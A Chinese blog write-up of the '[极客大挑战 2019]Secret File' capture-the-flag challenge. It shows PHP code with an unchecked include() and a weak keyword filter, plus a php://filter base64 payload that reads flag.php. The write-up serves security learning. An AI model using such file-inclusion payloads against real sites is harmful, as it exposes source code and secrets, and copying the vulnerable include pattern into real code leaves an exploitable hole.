[极客大挑战 2019]Secret File

时间：2020-06-29 09:32:16 阅读：62 评论：0 收藏：0 [点我收藏+]

查看源代码，发现一个可疑的链接

技术分享图片

访问这个页面

技术分享图片

点击secret

技术分享图片

使用burpsuite进行抓包

技术分享图片

发现响应包中有注释的php文件

<!DOCTYPE html>
<html>
<!--
   secr3t.php        
-->
</html>

访问secr3t.php

 1 <html>
 2     <title>secret</title>
 3     <meta charset="UTF-8">
 4 <?php
 5     highlight_file(__FILE__);
 6     error_reporting(0);
 7     $file=$_GET[‘file‘];
 8     if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
 9         echo "Oh no!";
10         exit();
11     }
12     include($file); 
13 //flag放在了flag.php里
14 ?>
15 </html>

第12行代码中的include函数说明secr3t.php存在文件包含漏洞，然后代码第8行没有过滤filter，所以我们可以直接使用php伪协议读取flag.php

payload：

http://7773a1c6-89cb-412e-92b7-e31b88c99ad8.node3.buuoj.cn/secr3t.php?file=php://filter/read=convert.base64-encode/resource=flag.php

最后使用burpsuite解码便可获取到flag

技术分享图片

SECR 详细X

网络释义

SECR: 高性能环氧涂层钢筋

Divine Secr: 丫丫姐妹会的神圣秘密

Miiow Secr: 猫人秘密

[极客大挑战 2019]Secret File

原文：https://www.cnblogs.com/gtx690/p/13206161.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)